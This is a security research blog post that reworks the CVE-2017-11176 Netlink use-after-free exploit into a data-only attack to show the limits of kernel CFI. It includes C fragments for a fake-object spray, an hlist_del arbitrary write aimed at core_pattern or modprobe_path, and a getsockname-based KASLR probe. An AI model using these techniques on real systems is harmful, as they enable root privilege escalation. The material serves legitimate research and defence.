Reminder: this blog series explores Control-Flow Integrity (CFI) in the Linux kernel. This is the fourth post, where we revisit the exploit of another existing CVE. If you need more context, you can access the other posts here:

  1. LLVM-CFI and the Linux Kernel
  2. From Crash Report to Root Access: Building an End-to-End Data-Only Exploit
  3. Revisiting CVE-2017-7308
  4. Revisiting CVE-2017-11176 (this post)

This post follows the same approach as the previous one: we take an existing bug with an existing exploit (relying on control-flow hijacking) and convert it into a data-only exploit that still works when CFI is on. The chosen exploit targets a vulnerability present in Linux kernels up to version 4.11.9. The bug was originally exploited by Nicolas Fabretti, from LEXFO. I recommend reading his thorough and informative write-up. While the original exploit ran with SMAP and KASLR disabled, here we assume that both SMAP and KASLR are enabled.

Reminder: SMAP (Supervisor Mode Access Prevention) is a security feature that prevents the kernel from accessing user-space data. Similarly, SMEP (Supervisor Mode Execution Prevention) prevents the kernel from executing user-space code.

Original Exploit

The vulnerability is a use-after-free in Netlink socket management. By racing a reference count on one of the core structures, it’s possible to free an object while it’s still in use. The vulnerable object is struct netlink_sock, a large object containing many corruption candidates. The original exploit corrupts the following field:

struct netlink_sock {
    (...)
    wait_queue_head_t wait;
    (...)
};

This field is the head of a wait queue, a linked list the kernel commonly uses to manage tasks waiting on an event. The list holds elements like:

struct __wait_queue {
    unsigned int flags;
    void *private;
    /* wake-up callback, called indirectly for each queued entry */
    int (*func)(struct __wait_queue *wait, unsigned mode, int flags, void *key);
    struct list_head task_list;
};

The third field, func, is a function pointer and the chosen corruption target. It’s a convenient target: a call through it can easily be triggered from user space with a single syscall, and that syscall has few side effects (it only touches a small number of fields). This matters a lot for exploit reliability, since the victim object is in a corrupted state after the use-after-free, and accessing garbage data could make the syscall fail early.
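To make the call path concrete, here is a simplified user-space model of how a wake-up walks a wait queue and calls each entry’s func. It is a sketch under stated assumptions, not the kernel’s actual wake-up code: wait_entry, wake_up_all and count_wakeup are hypothetical names, and exclusive wake-ups and locking are left out.

```c
#include <stddef.h>

/* Minimal doubly linked list, mirroring the kernel's struct list_head. */
struct list_head {
    struct list_head *next, *prev;
};

/* Hypothetical, trimmed stand-in for struct __wait_queue. */
struct wait_entry {
    unsigned int flags;
    void *private;
    int (*func)(struct wait_entry *wait, unsigned mode, int flags, void *key);
    struct list_head task_list;
};

/* Recover the enclosing structure from a pointer to one of its members. */
#define container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

/* Simplified wake-up loop: each entry's func is called indirectly, so
 * whoever controls an entry controls where this call lands. */
static void wake_up_all(struct list_head *head, unsigned mode, void *key)
{
    struct list_head *pos = head->next;

    while (pos != head) {
        struct list_head *next = pos->next; /* read before the callback runs */
        struct wait_entry *w = container_of(pos, struct wait_entry, task_list);

        w->func(w, mode, 0, key);
        pos = next;
    }
}

/* Example callback: counts its invocations through the key argument. */
static int count_wakeup(struct wait_entry *wait, unsigned mode, int flags, void *key)
{
    (void)wait;
    (void)mode;
    (void)flags;
    ++*(int *)key;
    return 0;
}
```

In the real exploit, the use-after-free is what hands the attacker control of such an entry, and therefore of the target of this indirect call.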

Function Pointer Hijack

To hijack control flow, the exploit reallocates the freed netlink_sock slot with controlled data. This is achieved by quickly issuing a sendmsg() syscall that heap-sprays user-controlled content with a matching allocation size. sendmsg() normally sends a message through a socket: it takes a buffer of user-controlled length and content as an argument, and the kernel later copies that buffer into a dynamically allocated kernel buffer. Since both the sendmsg() buffer and netlink_sock are allocated through kmalloc, sizing the spray buffer precisely makes them come from the same slab cache (if this is unclear, this write-up is a good refresher on the inner workings of the slab allocator).

The attack steps:

  1. Trigger the bug to (wrongly) free a netlink_sock.
  2. Immediately invoke sendmsg() with a buffer crafted to look like a netlink_sock, but with attacker values in the targeted fields.
  3. Ensure the linked-list head in the new fake netlink_sock points to a wait queue object residing in user-space (possible because SMAP is assumed disabled in the baseline exploit).
  4. When the corrupted list is used, the kernel fetches and uses the attacker-supplied function pointer, allowing full control over execution flow.
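Steps 2 and 3 boil down to laying out a buffer. The sketch below relies on hypothetical values: SPRAY_SIZE and NLK_WAIT_OFF are placeholders that must be taken from the target kernel build, and WQ_LIST_OFF assumes wait_queue_head_t is a 4-byte spinlock (padded to 8 bytes) followed by its list head, as on x86-64 without lock debugging. build_fake_nlk is a hypothetical helper, and the other fields the triggering syscall reads are not filled in.

```c
#include <stdint.h>
#include <string.h>

/* HYPOTHETICAL layout values: read the real ones from the target kernel. */
#define SPRAY_SIZE    1024  /* assumed size of the sprayed kmalloc buffer      */
#define NLK_WAIT_OFF  0x2a0 /* placeholder offsetof(struct netlink_sock, wait) */
#define WQ_LIST_OFF   8     /* task_list after a 4-byte spinlock + padding     */

struct list_head {
    struct list_head *next, *prev;
};

/* Fill buf with a fake netlink_sock whose wait queue holds a single entry:
 * the list node of a fake wait queue entry living in user space (only
 * reachable by the kernel because the baseline exploit assumes SMAP is off).
 * Other fields the triggering syscall reads are left at zero here. */
static void build_fake_nlk(uint8_t *buf, struct list_head *fake_node)
{
    struct list_head head;

    memset(buf, 0, SPRAY_SIZE);  /* a zeroed spinlock is an unlocked one */
    head.next = fake_node;       /* first queued entry */
    head.prev = fake_node;       /* last queued entry */
    memcpy(buf + NLK_WAIT_OFF + WQ_LIST_OFF, &head, sizeof(head));
}
```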

The next part of the exploit relies on return-oriented programming (ROP). The idea is to build a chain of short instruction sequences, called gadgets, that already exist in the kernel’s code. By carefully chaining these gadgets, the exploit performs arbitrary computation without injecting new code. This way, even if SMEP is enabled, the exploit can execute (almost) arbitrary code. In this case, the chain works as follows:

  • It redirects the kernel’s stack pointer (rsp on x86-64) to a malicious fake stack located in user-space memory, controlled by the attacker.

  • Each gadget ends with a return instruction, causing the kernel to pop the next gadget address from the fake stack, effectively chaining execution through these gadgets.

  • The gadgets overwrite the CR4 control register with a value whose SMEP bit is cleared. This disables SMEP, allowing user-space code to execute in kernel mode.

  • Finally, the ROP chain jumps to a payload in user-space memory that executes commit_creds(prepare_kernel_cred(0)): prepare_kernel_cred(0) builds a new set of credentials with root privileges, and commit_creds installs them on the current process.
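The CR4 step is plain bit arithmetic. A minimal sketch, assuming the x86-64 bit positions of SMEP (bit 20) and SMAP (bit 21); cr4_without_smep is a hypothetical helper that computes the value the gadgets would load, not part of the original chain.

```c
#include <stdint.h>

/* x86-64 CR4 bits relevant here: SMEP is bit 20, SMAP is bit 21. */
#define X86_CR4_SMEP (1ULL << 20)
#define X86_CR4_SMAP (1ULL << 21)

/* Value to load into CR4 so that SMEP is off while every other bit,
 * including SMAP, keeps its current state. */
static uint64_t cr4_without_smep(uint64_t cr4)
{
    return cr4 & ~X86_CR4_SMEP;
}
```

For example, a CR4 value of 0x1407f0 becomes 0x407f0, and a value that also has SMAP set (0x3407f0) becomes 0x2407f0.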

Again, CFI would stop this attack: the corrupted func pointer targets a gadget, which is not the beginning of a kernel function with a type compatible with the call site, so the indirect call violates the Control-Flow Graph and is rejected. However, other interesting fields in the netlink_sock structure let us adapt the exploit into a data-only attack.

Data-Only Attack Variant

The idea here is to target other fields in the same structure to gain arbitrary read and write primitives, so we can avoid hijacking control flow altogether. One such field is:

struct netlink_sock {
    struct sock {
        struct hlist_node {
            struct hlist_node *next;
            struct hlist_node **pprev;
        } sk_bind_node;
    } sk;
};

The sk_bind_node field stores the linked-list metadata of an entry: next points to the next entry, and pprev stores the address of the pointer that references this entry (the previous element’s next field, or the list head). Together, they make the entry part of a doubly linked list.

By inspecting the code that accesses the victim object’s fields, we find that calling the setsockopt system call (which modifies socket options, unlike getsockopt, which reads them) with the right parameters triggers the deletion of this node from the linked list.

This indirection through pprev simplifies list manipulation: the first entry and the following ones can be unlinked the same way, without special-casing the list head. The function that removes an element from the list is implemented as follows:

void hlist_del(struct hlist_node *n)
{
    struct hlist_node *next = n->next;
    struct hlist_node **pprev = n->pprev;

    *pprev = next;
    if (next)
        next->pprev = pprev;
}

Recall that when this function runs, n points to the sk_bind_node field of the victim object, whose content we control after the reallocation.

Thus, if we set pprev to an arbitrary kernel address and next to the value we want to write, executing *pprev = next; (line 6) makes the kernel write our value to the chosen memory location.

This list deletion can thus be used as an arbitrary 8-byte write primitive.
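The primitive can be checked in user space. The sketch below reuses the deletion logic shown above on a fake node; write8_via_unlink is a hypothetical helper, and the destination is a local slot rather than a kernel address. Note the second store: the pprev field of whatever next points to must itself be writable.

```c
#include <stddef.h>

struct hlist_node {
    struct hlist_node *next;
    struct hlist_node **pprev;
};

/* Same logic as the deletion routine above. */
static void hlist_del(struct hlist_node *n)
{
    struct hlist_node *next = n->next;
    struct hlist_node **pprev = n->pprev;

    *pprev = next;              /* store 1: *where = what         */
    if (next)
        next->pprev = pprev;    /* store 2: what->pprev = where   */
}

/* Turn an unlink into an 8-byte write: the fake node plays the role of the
 * attacker-controlled sk_bind_node inside the reallocated object. */
static void write8_via_unlink(struct hlist_node **where, struct hlist_node *what)
{
    struct hlist_node fake;

    fake.next = what;
    fake.pprev = where;
    hlist_del(&fake);
}
```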

Using the Arbitrary Write Primitive

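Using this primitive, we can apply the same privilege escalation technique as before: overwriting the core_pattern symbol. When core_pattern starts with a pipe character (|), the kernel runs the named program with root privileges whenever a process dumps core.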

The string "|tmp/a" is 7 bytes long including the terminating NUL character, so a single 8-byte write is enough to overwrite the symbol with a path an unprivileged user has access to.

Converting this string to a pointer gives the value 0x00612F706D747C (note the byte order is reversed due to endianness).
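A quick way to double-check this constant is to pack the string’s bytes the way an 8-byte little-endian store lays them out. pack_le64 is a hypothetical helper; building the value byte by byte keeps the result independent of the host’s endianness.

```c
#include <stdint.h>
#include <string.h>

/* Pack a short string (NUL included) into the integer an 8-byte
 * little-endian store would write: the first character ends up in the
 * least significant byte. Strings of 8 or more characters are truncated. */
static uint64_t pack_le64(const char *s)
{
    uint8_t bytes[8] = {0};
    size_t n = strlen(s) + 1;   /* include the terminating NUL */
    uint64_t v = 0;

    if (n > sizeof(bytes))
        n = sizeof(bytes);
    memcpy(bytes, s, n);
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | bytes[i];
    return v;
}
```

Calling pack_le64("|tmp/a") yields 0x612F706D747C, the value quoted above.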

There is a subtlety, though: the last instruction of the deletion procedure executes the assignment next->pprev = pprev (line 8). Here, next holds the path we want to write, and interpreted as a pointer, this string is not a valid kernel address. Writing to it triggers an unrecoverable fault in kernel mode (a kernel oops), which kills the process.

To circumvent this, the write is split in two so we can control the upper part of the resulting pointer and choose a memory region mapped in the kernel address space.

For example, instead of writing 0x00612F706D747C at &core_pattern, we write 0xFFFF8800706D747C at &core_pattern and 0xFFFF88000000612F 4 bytes further (&core_pattern + 4).
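The split can be simulated in user space. This sketch assumes, as the example values suggest, a direct mapping starting at 0xFFFF880000000000 (DIRECT_MAP_HI); split_values and store_le64 are hypothetical helpers, and a 16-byte buffer stands in for core_pattern.

```c
#include <stdint.h>
#include <string.h>

/* ASSUMPTION: base of the kernel's direct mapping, matching the example. */
#define DIRECT_MAP_HI 0xFFFF880000000000ULL

/* Store v at dst as an x86-64 8-byte write would (little-endian). */
static void store_le64(uint8_t *dst, uint64_t v)
{
    for (int i = 0; i < 8; i++)
        dst[i] = (uint8_t)(v >> (8 * i));
}

/* Compute the values to write at dst and dst + 4 so that dst ends up holding
 * a 6-character string plus its NUL terminator. Each value's upper 32 bits
 * look like a direct-map address, so the side-effect store at value + 8
 * (next->pprev = pprev) stays in mapped kernel memory.
 * Assumes strlen(s) == 6. */
static void split_values(const char *s, uint64_t *first_write, uint64_t *second_write)
{
    uint32_t lo = 0, hi = 0;

    for (int i = 0; i < 4; i++)
        lo |= (uint32_t)(uint8_t)s[i] << (8 * i);
    for (int i = 0; i < 2; i++)   /* bytes 2 and 3 stay 0: NUL + padding */
        hi |= (uint32_t)(uint8_t)s[4 + i] << (8 * i);
    *first_write = DIRECT_MAP_HI | lo;
    *second_write = DIRECT_MAP_HI | hi;
}
```

The order of the two writes matters: doing the +4 write first and the base write second would clobber bytes 4 to 7 with 0x00, 0x88, 0xFF, 0xFF.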

Interpreted as pointers, both values fall in memory regions mapped by the kernel, so the side-effect writes performed by next->pprev = pprev are legal. They may overwrite unrelated data, but the chance of corrupting something that crashes the kernel is low.

Another Interesting Target: modprobe_path

Another interesting parameter we can target instead of core_pattern is modprobe_path.

This symbol holds the path of an executable (by default /sbin/modprobe) that the kernel runs when it needs to load a module on demand.

One example is when the kernel tries to execute a file but does not recognize its format among the registered binary handlers (ELF, shebang scripts, etc.). In that case, it runs this executable to load a kernel module that might handle the format. Aliases of the module names requested through __request_module are listed in /lib/modules/$(uname -r)/modules.alias. More details about the autoloading process are available here.

In this alternative exploit, after overwriting modprobe_path, we simply run a dummy executable with an invalid magic number, forcing the kernel to launch our controlled executable with root privileges.
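Triggering the helper only requires a file the kernel cannot classify. A minimal sketch, with a hypothetical helper name (run_unknown_binfmt) and a placeholder path template. One detail worth knowing: in the kernel’s exec code, the module request is skipped when the first four bytes of the file are all printable, which is why 0xff bytes are used here. On an unmodified system the exec simply fails with ENOEXEC; with modprobe_path overwritten, the kernel would run the attacker’s program while handling that same failure.

```c
#include <errno.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Create an executable file with a magic number no binary handler knows,
 * then try to run it in a child. Returns the errno reported by execve in
 * the child, or -1 if setup failed. */
static int run_unknown_binfmt(char *path_template)
{
    /* Non-printable bytes, so the kernel does not bail out before
     * requesting a "binfmt-XXXX" module. */
    static const unsigned char magic[4] = { 0xff, 0xff, 0xff, 0xff };
    int status;
    pid_t pid;
    int fd = mkstemp(path_template);

    if (fd < 0)
        return -1;
    if (write(fd, magic, sizeof(magic)) != (ssize_t)sizeof(magic) ||
        fchmod(fd, 0755) < 0) {
        close(fd);
        return -1;
    }
    close(fd);   /* an fd open for writing would make execve fail */

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *argv[] = { path_template, NULL };
        char *envp[] = { NULL };

        execve(path_template, argv, envp);
        _exit(errno);   /* only reached if execve failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```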

Bypassing KASLR

We can also bypass KASLR with this vulnerability, using the following field:

struct netlink_sock {
    (...)
    unsigned long *groups;
    (...)
};

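This field is read by the getsockname system call, which copies groups[0] into the nl_groups field of the returned address. Since nl_groups is a 32-bit field, only the low 4 bytes of that value reach user space.

By setting groups to a kernel memory address, we can build an arbitrary 4-byte read primitive; two reads at consecutive addresses recover 8 bytes.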
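A sketch of how two such reads combine into 8 bytes. netlink_leak32 is a hypothetical wrapper that assumes the netlink_sock behind the socket has already been replaced so that groups points at the target; leak32_fn is a hypothetical callback type for "point groups at this address, then read"; mock_leak32 is a user-space stand-in for trying leak64 out.

```c
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <linux/netlink.h>

/* HYPOTHETICAL wrapper: assumes the (fake) netlink_sock behind sock_fd has
 * its groups field pointing at the target address. */
int netlink_leak32(int sock_fd, uint32_t *out)
{
    struct sockaddr_nl addr;
    socklen_t len = sizeof(addr);

    memset(&addr, 0, sizeof(addr));
    if (getsockname(sock_fd, (struct sockaddr *)&addr, &len) < 0)
        return -1;
    *out = addr.nl_groups;   /* low 32 bits of groups[0] */
    return 0;
}

/* Hypothetical callback: point groups at kaddr, then leak 4 bytes. */
typedef int (*leak32_fn)(uint64_t kaddr, uint32_t *out, void *ctx);

/* Combine two 4-byte leaks into one 8-byte value. x86-64 is little-endian,
 * so the low half sits at kaddr and the high half at kaddr + 4. */
static int leak64(leak32_fn leak32, void *ctx, uint64_t kaddr, uint64_t *out)
{
    uint32_t lo, hi;

    if (leak32(kaddr, &lo, ctx) < 0 || leak32(kaddr + 4, &hi, ctx) < 0)
        return -1;
    *out = ((uint64_t)hi << 32) | lo;
    return 0;
}

/* User-space stand-in: kaddr is an offset into ctx, and only the low half
 * of the 8-byte load is returned, mimicking the truncation to nl_groups. */
static int mock_leak32(uint64_t kaddr, uint32_t *out, void *ctx)
{
    uint64_t word;

    memcpy(&word, (const uint8_t *)ctx + kaddr, sizeof(word));
    *out = (uint32_t)word;
    return 0;
}
```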

Then, using the same technique as in the previous data-only attack (see Bypassing KASLR), we probe the kernel address space to find the KASLR offset.

However, there are important differences:

  • In the pipe-based attack, probing an invalid address only makes the syscall return an error: the kernel treats the address as user-supplied and handles the resulting fault gracefully instead of halting.

  • Here, the kernel dereferences the address directly, so an invalid probe causes a kernel oops, and the outcome depends on the kernel configuration:

    • If CONFIG_PANIC_ON_OOPS is enabled (or the kernel.panic_on_oops sysctl is set), the kernel panics on the first invalid probe, so the KASLR bypass fails.

    • This option is rarely enabled on major distributions, which prefer to recover from such errors rather than turn them into a denial of service. In that case, the kernel only kills the offending process.

To cope with this, we fork the current process before each probe and perform the read in the child. If the address is not mapped, only the child dies, and exploitation continues in the parent process.
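A sketch of the fork-per-probe loop. probe_in_child and first_mapped are hypothetical helpers, the probe callback stands for the getsockname-based read, and user_read_probe is a user-space stand-in that crashes the child on unmapped memory, much like an oops kills the probing process.

```c
#include <stdint.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* A probe returns 0 if reading addr succeeded. If addr is unmapped, the
 * calling process is expected to die instead of returning. */
typedef int (*probe_fn)(uint64_t addr);

/* Run one probe in a throwaway child. Returns 1 if the child finished
 * normally (address readable), 0 if it died or failed, -1 on error. */
static int probe_in_child(probe_fn probe, uint64_t addr)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(probe(addr) == 0 ? 0 : 1);
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
}

/* Scan [start, end) in fixed steps and return the first readable address,
 * or 0 if none was found. */
static uint64_t first_mapped(probe_fn probe, uint64_t start, uint64_t end, uint64_t step)
{
    for (uint64_t a = start; a < end; a += step)
        if (probe_in_child(probe, a) == 1)
            return a;
    return 0;
}

/* User-space stand-in probe: dereferences addr, so an unmapped address
 * kills the child with SIGSEGV. */
static int user_read_probe(uint64_t addr)
{
    volatile const uint8_t *p = (volatile const uint8_t *)(uintptr_t)addr;

    (void)*p;
    return 0;
}
```

In the exploit, the scan would cover the window where the kernel image can be placed. Assuming the usual x86-64 layout (a 1 GiB window starting at 0xffffffff80000000, 2 MiB alignment) and that nothing below the randomized base is mapped there, that would look like first_mapped(probe, 0xffffffff80000000, 0xffffffffc0000000, 0x200000).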


We now have the full exploits! The sources are available here:

This concludes our series on CFI. I hope you enjoyed it! If you want to keep reading on this topic, here is a collection of links, in no particular order, worth checking out:
